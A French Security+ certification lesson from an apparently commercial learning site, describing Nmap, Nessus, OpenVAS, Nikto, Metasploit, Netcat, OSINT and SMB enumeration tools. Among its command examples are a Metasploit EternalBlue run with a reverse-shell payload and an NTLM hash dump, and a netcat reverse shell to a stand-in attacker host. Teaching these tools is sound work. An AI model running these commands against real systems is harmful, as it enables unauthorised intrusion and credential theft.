Outils d’analyse courants : Nessus, OpenVAS et Nmap
Familiarisez-vous concrètement avec les outils de référence du secteur pour découvrir les hôtes, analyser les ports et identifier les vulnérabilités.
Outils d’analyse courants : Nessus, OpenVAS et Nmap est une leçon Cloud & IT Cert Prep gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cloud & IT Cert Prep, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cloud & IT Cert Prep comprend 4 leçons au total.
L’écosystème des outils d’analyse
Les professionnels de la Security utilisent divers outils d’analyse pour différents objectifs : découverte d’hôtes, analyse des ports, énumération des services, détection du système d’exploitation, identification des vulnérabilités et test des applications Web. Security+ exige de connaître les outils les plus utilisés dans chaque catégorie. Comprendre ce que fait chaque outil — et ce qu’il ne peut pas faire — vous aide à sélectionner l’outil approprié pour une tâche donnée et à interpréter correctement les résultats. Les résultats obtenus avec plusieurs outils complémentaires offrent une couverture plus complète que ceux d’un seul outil.
Nmap : le mappeur de réseau
Nmap (Network Mapper) est l’outil open source le plus utilisé pour la découverte réseau et l’audit de Security. Il peut découvrir les hôtes actifs, énumérer les ports ouverts, détecter les services en cours d’exécution et leurs versions, et identifier le système d’exploitation. Nmap utilise différentes techniques d’analyse, notamment l’analyse SYN (par défaut, rapide et relativement discrète), TCP Connect (établissement complet de la liaison, plus bruyant mais ne nécessitant pas les privilèges root), l’analyse UDP et l’analyse de version. Il est fourni avec le Nmap Scripting Engine (NSE), qui propose des centaines de scripts pour détecter les vulnérabilités, effectuer du forçage brutal et réaliser des exploitations.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsRésultats et interprétation de Nmap
Interpréter correctement les résultats de Nmap est une compétence essentielle. Chaque ligne représente un port avec son état (ouvert : un service est en écoute ; fermé : l’hôte a répondu, mais aucun service n’est en écoute ; filtré : aucune réponse ou hôte ICMP inaccessible, probablement en raison d’un pare-feu), son protocole et le service ou la version détecté. Les ports ouverts représentent une surface d’attaque potentielle. Des ports ouverts inattendus sur un hôte peuvent indiquer une compromission ou des services non autorisés. Les options -oN, -oX et -oG enregistrent les résultats dans les formats normal, XML et exploitable par grep ; l’enregistrement des résultats est essentiel pour la documentation et la comparaison des analyses au fil du temps.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus : Scanner de vulnérabilités d’entreprise
Nessus (de Tenable) est le Scanner de vulnérabilités commercial le plus largement déployé. Il utilise une architecture à Plugins avec plus de 100 000 Plugins couvrant les CVE, les vérifications de configuration, les référentiels de conformité (CIS, DISA STIG) et la détection des logiciels malveillants. Nessus effectue des analyses avec Credentials en se connectant aux systèmes avec les Credentials fournies afin d’inspecter les versions des logiciels installés, les clés de registre et les fichiers de configuration, ce qui produit des résultats beaucoup plus précis que le sondage réseau sans Credentials. Nessus produit des rapports détaillés avec les scores CVSS, les descriptions des vulnérabilités et les recommandations de Remediation. La version gratuite Nessus Essentials analyse jusqu’à 16 IPs.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS : analyse des vulnérabilités open source
OpenVAS (Open Vulnerability Assessment System) est un Scanner de vulnérabilités gratuit et open source géré par Greenbone Networks. Il s’agit du fork soutenu par la communauté de l’ancien Nessus, avant sa commercialisation. OpenVAS utilise des NVT (Network Vulnerability Tests) analogues aux Plugins de Nessus. La Greenbone Community Edition (GCE) fournit une interface de gestion Web (Greenbone Security Assistant). OpenVAS est populaire dans les environnements où les coûts de licence empêchent l’utilisation d’outils commerciaux. Il offre un ensemble de fonctionnalités plus large que Nmap tout en restant gratuit, ce qui en fait un choix courant pour les petites organisations, les environnements universitaires et les laboratoires de Security.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto : Scanner de vulnérabilités des serveurs Web
Nikto est un Scanner de serveurs Web open source qui recherche les fichiers dangereux, les versions obsolètes des logiciels, les problèmes de configuration des serveurs et les vulnérabilités Web courantes. Il vérifie plus de 6 700 problèmes connus, notamment les méthodes HTTP non sécurisées, les en-têtes de Security manquants, les interfaces d’administration exposées, les Credentials par défaut et les vulnérabilités CGI courantes. Nikto est bruyant et n’est pas conçu pour être discret : il génère des journaux importants sur la cible. Il complète les Scanner réseau en fournissant des vérifications propres au Web que Nessus et OpenVAS ne couvrent pas toujours en profondeur. Utilisez toujours Nikto uniquement sur des systèmes pour lesquels vous êtes autorisé à effectuer des tests.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
Le Metasploit Framework est la plateforme de test d’intrusion la plus utilisée. Il fournit une base de données d’exploits, de charges utiles, de modules auxiliaires et d’outils post-exploitation. Les candidats à Security+ doivent comprendre ce qu’est Metasploit et comment il s’intègre à un test d’intrusion, même s’ils ne l’ont jamais utilisé. Les modules Metasploit comprennent : les exploits (code qui exploite une vulnérabilité), les payloads (shellcode exécuté après une exploitation réussie, comme Meterpreter), les modules auxiliaires (analyse, fuzzing et énumération sans exploitation) et les modules post-exploitation (élévation de privilèges, récupération de Credentials et déplacement latéral après l’accès initial).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat : le couteau suisse
Netcat (nc) est un utilitaire simple mais polyvalent qui lit et écrit des données via des connexions réseau utilisant TCP ou UDP. Il possède d’innombrables usages dans le domaine de la Security : établir des shells inversés depuis des hôtes compromis, transférer des fichiers entre des segments réseau, effectuer une analyse des ports, créer de simples écouteurs réseau pour les tests et récupérer des bannières afin d’identifier les versions des services. Sa simplicité et sa disponibilité sur presque tous les systèmes Linux en font un outil fréquemment utilisé aussi bien dans l’administration légitime que dans les boîtes à outils des attaquants. Il est donc également important de le comprendre du point de vue de la détection.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtOutils Recon-ng et OSINT
Recon-ng est un framework de reconnaissance Web conçu pour la collecte d’informations OSINT (renseignement de sources ouvertes). Il utilise des modules qui interrogent des sources publiques — Shodan, Bing, HaveIBeenPwned, les enregistrements DNS, LinkedIn, WHOIS et les journaux de transparence des certificats — afin de recueillir des informations sur une cible avant le début de toute analyse active. La phase de reconnaissance d’un test d’intrusion commence généralement par l’OSINT afin d’établir une vue d’ensemble de la topologie réseau de la cible, des noms des employés, des formats d’adresses e-mail, des technologies utilisées et des ressources exposées publiquement. Un bon travail d’OSINT peut révéler des chemins d’attaque qui demanderaient beaucoup plus de temps à découvrir au moyen de la seule analyse active.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Énumération réseau avec Enum4linux
Enum4linux énumère les informations provenant des hôtes Windows et des serveurs Samba (SMB Linux) au moyen de sessions nulles et de MSRPC. Il extrait les noms d’utilisateur, les appartenances aux groupes, les partages, les stratégies de mots de passe et les informations de groupe de travail. Lors des tests d’intrusion internes, enum4linux peut révéler rapidement les comptes utilisateur disponibles pour le password spraying ainsi que la structure des partages d’un environnement. Les versions modernes de Windows limitent par défaut l’accès par session nulle, mais les environnements mal configurés exposent souvent une quantité importante d’informations. Des fonctionnalités similaires sont disponibles dans samrdump.py d’Impacket et dans CrackMapExec pour l’énumération authentifiée.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10Sélectionner l’outil adapté à la tâche
Les professionnels de la Security associent les outils aux tâches à effectuer. Pour la découverte d’hôtes et l’analyse des ports : Nmap. Pour l’identification des vulnérabilités à grande échelle : Nessus (commercial) ou OpenVAS (gratuit). Pour les vulnérabilités des serveurs Web : Nikto. Pour les attaques contre les applications Web : Burp Suite. Pour l’Exploitation : Metasploit. Pour la reconnaissance OSINT : Recon-ng, theHarvester, Shodan. Pour l’analyse du trafic réseau : Wireshark, tcpdump. Pour les attaques sans fil : la suite Aircrack-ng. L’examen Security+ évalue les connaissances conceptuelles de ces outils : vous devez savoir à quoi sert chacun d’eux, même sans avoir pratiqué tous ces outils.
Vérification rapide
Vérifiez votre compréhension des concepts de CompTIA Security+ (SY0-701) abordés dans cette leçon.
Récapitulatif de la leçon
Dans cette leçon, vous avez appris que Nmap constitue la base de la découverte d’hôtes, de l’analyse des ports et de la détection des versions, avec un puissant moteur de scripts offrant des fonctionnalités supplémentaires ; que Nessus et OpenVAS effectuent une analyse complète des vulnérabilités correspondant aux CVE connues, en utilisant un accès avec identifiants pour une précision maximale ; et que Metasploit fournit un framework d’exploitation permettant aux testeurs d’intrusion de confirmer que les vulnérabilités sont réellement exploitables et de démontrer leur impact concret. Nous allons maintenant étudier le cycle de vie complet d’un test d’intrusion, de la reconnaissance au rapport.
Questions Fréquemment Posées
La leçon « Outils d’analyse courants : Nessus, OpenVAS et Nmap » est-elle gratuite ?
Oui — le texte complet de « Outils d’analyse courants : Nessus, OpenVAS et Nmap » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cloud & IT Cert Prep, passe à CoddyKit PRO. Le cours Cloud & IT Cert Prep comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Outils d’analyse courants : Nessus, OpenVAS et Nmap » ?
Familiarisez-vous concrètement avec les outils de référence du secteur pour découvrir les hôtes, analyser les ports et identifier les vulnérabilités. Tu pratiques Cloud & IT Cert Prep avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cloud & IT Cert Prep ?
Aucune expérience préalable n'est requise. Cloud & IT Cert Prep sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.
Combien de temps prend la leçon « Outils d’analyse courants : Nessus, OpenVAS et Nmap » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cloud & IT Cert Prep ?
Oui. Chaque leçon Cloud & IT Cert Prep inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Analyse des vulnérabilités ou tests d’intrusion
- Outils d’analyse courants : Nessus, OpenVAS et Nmap
- Phases des tests d’intrusion : de la reconnaissance au rapport
- Évaluation CVSS et priorisation des vulnérabilités